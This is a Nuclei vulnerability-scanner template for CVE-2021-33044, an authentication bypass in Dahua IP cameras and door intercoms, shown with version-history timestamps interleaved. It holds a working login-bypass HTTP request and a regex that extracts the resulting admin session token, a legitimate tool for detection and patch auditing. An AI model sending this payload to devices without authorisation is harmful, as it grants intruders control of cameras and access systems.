nuclei-templates/http/cves/2021/CVE-2021-33044.yaml

61 lines
1.8 KiB
YAML
Raw Normal View History

id: CVE-2021-33044
info:
name: Dahua IPC/VTH/VTO - Authentication Bypass
author: gy741
severity: critical
description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
reference:
- https://github.com/dorkerdevil/CVE-2021-33044
2021-10-19 12:14:06 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
- https://seclists.org/fulldisclosure/2021/Oct/13
- https://www.dahuasecurity.com/support/cybersecurity/details/957
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-33044
cwe-id: CWE-287
2023-07-11 19:49:27 +00:00
epss-score: 0.12129
cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: dahuasecurity
product: ipc-hum7xxx_firmware
tags: dahua,cve,cve2021,auth-bypass,seclists
http:
- raw:
- |
POST /RPC2_Login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Connection: close
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
2021-11-08 10:15:54 +00:00
Origin: {{BaseURL}}
Referer: {{BaseURL}}
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-11-08 10:15:54 +00:00
- '"result":true'
- 'id'
- 'params'
- 'session'
condition: and
2021-10-19 12:14:06 +00:00
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
2021-10-19 12:14:06 +00:00
extractors:
- type: regex
group: 1
regex:
- ',"result":true,"session":"([a-z]+)"\}'
2023-07-11 19:49:27 +00:00
part: body